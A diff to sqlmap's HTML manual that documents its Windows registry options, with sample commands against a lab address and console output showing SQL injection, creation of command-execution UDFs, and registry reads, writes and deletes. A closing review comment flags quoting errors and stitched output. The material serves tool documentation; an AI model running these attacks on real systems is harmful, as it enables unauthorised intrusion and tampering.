diff --git a/doc/README.html b/doc/README.html index 559fe37fa..e8cb87d06 100644 --- a/doc/README.html +++ b/doc/README.html @@ -5345,54 +5345,163 @@ meterpreter > exit
It is possible to access Windows registry when the back-end +database management system is either MySQL, PostgreSQL or +Microsoft SQL Server, and when the underlying database layer +supports stacked SQL queries. Also, session user has to have +the needed privileges to access it.
+Option: -
-reg-read
TODO
+Using this option you can read registry key values.
+Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
-Write a Windows registry key value data
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:15] [INFO] retrieved: 8.4.2,
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
+[hh:mm:23] [INFO] retrieved: 0
+[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:24] [INFO] retrieved: 0
+[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
+[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
+CurrentVersion]
+which registry key value do you want to read? [ProductName]
+[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
+Windows NT\CurrentVersion\ProductName'
+[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP
+Registry key value data: 'ProductName REG_SZ Microsoft Windows XP'
+
+
+
+
+Option: -
-reg-add
TODO
+Using this option you can write registry key values.
+Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
-Delete a Windows registry key value
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to write? Test
+which registry key value data do you want to write? 1
+which registry key value data-type is it? [REG_SZ] REG_DWORD
+[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
+with data '1'. This will work only if the user running the database process has privileges
+to modify the Windows registry.
+
+
+
+
+Option: -
-reg-del
TODO
+Using this option you can delete registry keys.
+ +Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
+
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to delete? Test
+are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
+sqlmap\Test? [y/N] y
+[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'.
+This will work only if the user running the database process has privileges to modify the
+Windows registry.
+
+
+
-Option: -
-reg-key
Options: -
-reg-key
, -
-reg-value
,
+-
-reg-data
and -
-reg-type
TODO
+These switches can be used to provide data needed for proper running of
+options -
-reg-read
, -
-reg-add
and
+-
-reg-del
. So, instead of providing registry key
+information when asked, you can use them at command prompt as program
+arguments.
With -
-reg-key
option you specify used windows
+registry key path, with -
-reg-value
value item
+name inside provided key, with -
-reg-data
value
+data, while with -
-reg-type
option you specify
+type of the value item.
Option: -
-reg-value
TODO
- - -Option: -
-reg-data
TODO
- - -Option: -
-reg-type
TODO
- +So, another way of running example from option
+-
-reg-add
could be:
+
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \
+ --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
+
+
+
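Review bot: the command-line form added at the end of the hunk, `$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \` followed by `--reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1`, passes the key path unquoted, so a POSIX shell removes the backslashes before sqlmap ever sees the argument (`\S` becomes `S`, `\s` becomes `s`) and the tool would receive `HKEY_LOCAL_MACHINESOFTWAREsqlmap`; the example should single-quote the path, e.g. `--reg-key='HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap'`. The same snippet is introduced as "another way of running example from option --reg-add", but the interactive run above answers `REG_DWORD` to the data-type prompt while the command-line form uses `--reg-type=REG_SZ`; make the two match so they really are equivalent invocations. Also, the new `--reg-del` description says "you can delete registry keys", whereas the prompts (`which registry key value do you want to delete? Test`) and the line this replaces ("Delete a Windows registry key value") show it removes a single value under a key; "registry key values" would be consistent with the `--reg-read` and `--reg-add` wording. Minor: the confirmation line in the `--reg-del` transcript is missing its closing quote (`'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test? [y/N]`), and the timestamps in the `--reg-add` and `--reg-del` transcripts jump backwards (`[hh:mm:30]` then `[hh:mm:06]`), which reads as output stitched together from separate runs; a single clean capture would be preferable for documentation.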